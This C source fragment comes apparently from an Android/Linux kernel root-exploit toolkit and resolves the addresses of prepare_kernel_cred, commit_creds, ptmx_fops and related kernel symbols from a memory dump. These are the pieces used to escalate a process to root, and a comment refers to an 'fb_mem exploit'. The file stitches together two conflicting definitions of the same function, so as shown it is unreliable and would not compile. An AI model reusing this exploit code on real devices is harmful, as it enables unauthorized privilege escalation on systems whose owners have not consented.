/*
 * Fill in the kernel symbol addresses this program keeps in file-scope
 * pointers (prepare_kernel_cred, commit_creds, remap_pfn_range,
 * vmalloc_exec, ptmx_fops) by searching a buffer holding kernel memory.
 *
 * mem    - start of the buffer to search
 * length - size of that buffer in bytes
 *
 * Pointers that are already non-NULL are left untouched. This function
 * only resolves addresses; it never calls through them.
 *
 * Returns true when has_all_essential_addresses() is satisfied, either
 * right after the symbol-table pass or after the fallback helpers ran.
 */
static bool find_variables_in_memory(void *mem, size_t length)
{
    kallsyms *table;
    bool resolved = false;

    printf("Search address in memory...\n");

    table = kallsyms_in_memory_init(mem, length);
    if (table) {
        printf("Using kallsyms_in_memory...\n");

        /* Credential-management entry points of the kernel. */
        if (!prepare_kernel_cred) {
            prepare_kernel_cred = (prepare_kernel_cred_t)
                kallsyms_in_memory_lookup_name(table, "prepare_kernel_cred");
        }
        if (!commit_creds) {
            commit_creds = (commit_creds_t)
                kallsyms_in_memory_lookup_name(table, "commit_creds");
        }

        if (!remap_pfn_range) {
            remap_pfn_range = (void *)
                kallsyms_in_memory_lookup_name(table, "remap_pfn_range");
        }
        if (!vmalloc_exec) {
            vmalloc_exec = (void *)
                kallsyms_in_memory_lookup_name(table, "vmalloc_exec");
        }

        if (!ptmx_fops) {
            ptmx_fops = (void *)
                kallsyms_in_memory_lookup_name(table, "ptmx_fops");
            if (!ptmx_fops) {
                /*
                 * Name lookup failed. The return value is not used here, so
                 * this helper presumably stores ptmx_fops itself (confirm
                 * against its definition).
                 */
                find_ptmx_fops_address(table, mem, length);
            }
        }

        kallsyms_in_memory_free(table);
        resolved = has_all_essential_addresses();
    }

    if (resolved) {
        return true;
    }

    /*
     * No usable symbol table, or it did not yield everything: fall back to
     * the per-symbol helpers, which are defined outside this function.
     */
    setup_prepare_kernel_cred_address_in_memory(mem, length);
    setup_commit_creds_address_in_memory(mem, length);

    return has_all_essential_addresses();
}
/*
 * Fill in the kernel symbol addresses this program keeps in file-scope
 * pointers (prepare_kernel_cred, commit_creds, ptmx_fops) by searching a
 * buffer holding kernel memory.
 *
 * mem    - start of the buffer to search
 * length - size of that buffer in bytes
 *
 * Pointers that are already non-NULL are left untouched. This function
 * only resolves addresses; it never calls through them.
 *
 * Returns true when all three pointers are non-NULL, either right after
 * the symbol-table pass or after the fallback helpers ran.
 */
bool find_variables_in_memory(void *mem, size_t length)
{
    kallsyms *table;
    bool resolved = false;

    printf("Search address in memroy...\n");

    table = kallsyms_in_memory_init(mem, length);
    if (table) {
        printf("Using kallsyms_in_memroy...\n");

        /* Credential-management entry points of the kernel. */
        if (!prepare_kernel_cred) {
            prepare_kernel_cred = (prepare_kernel_cred_t)
                kallsyms_in_memory_lookup_name(table, "prepare_kernel_cred");
        }
        if (!commit_creds) {
            commit_creds = (commit_creds_t)
                kallsyms_in_memory_lookup_name(table, "commit_creds");
        }

        if (!ptmx_fops) {
            ptmx_fops = (void *)
                kallsyms_in_memory_lookup_name(table, "ptmx_fops");
            if (!ptmx_fops) {
                /*
                 * Name lookup failed. The return value is not used here, so
                 * this helper presumably stores ptmx_fops itself (confirm
                 * against its definition).
                 */
                find_ptmx_fops_address(table, mem, length);
            }
        }

        /*
         * FIXME: the table is deliberately NOT released. The original note
         * says that freeing it crashes when used with the fb_mem exploit,
         * so kallsyms_in_memory_free(table) stays disabled and the table
         * is leaked on every call.
         */

        resolved = prepare_kernel_cred && commit_creds && ptmx_fops;
    }

    if (resolved) {
        return true;
    }

    /*
     * No usable symbol table, or it did not yield everything: fall back to
     * the per-symbol helpers, which are defined outside this function.
     */
    setup_prepare_kernel_cred_address_in_memory(mem, length);
    setup_commit_creds_address_in_memory(mem, length);

    return prepare_kernel_cred && commit_creds && ptmx_fops;
}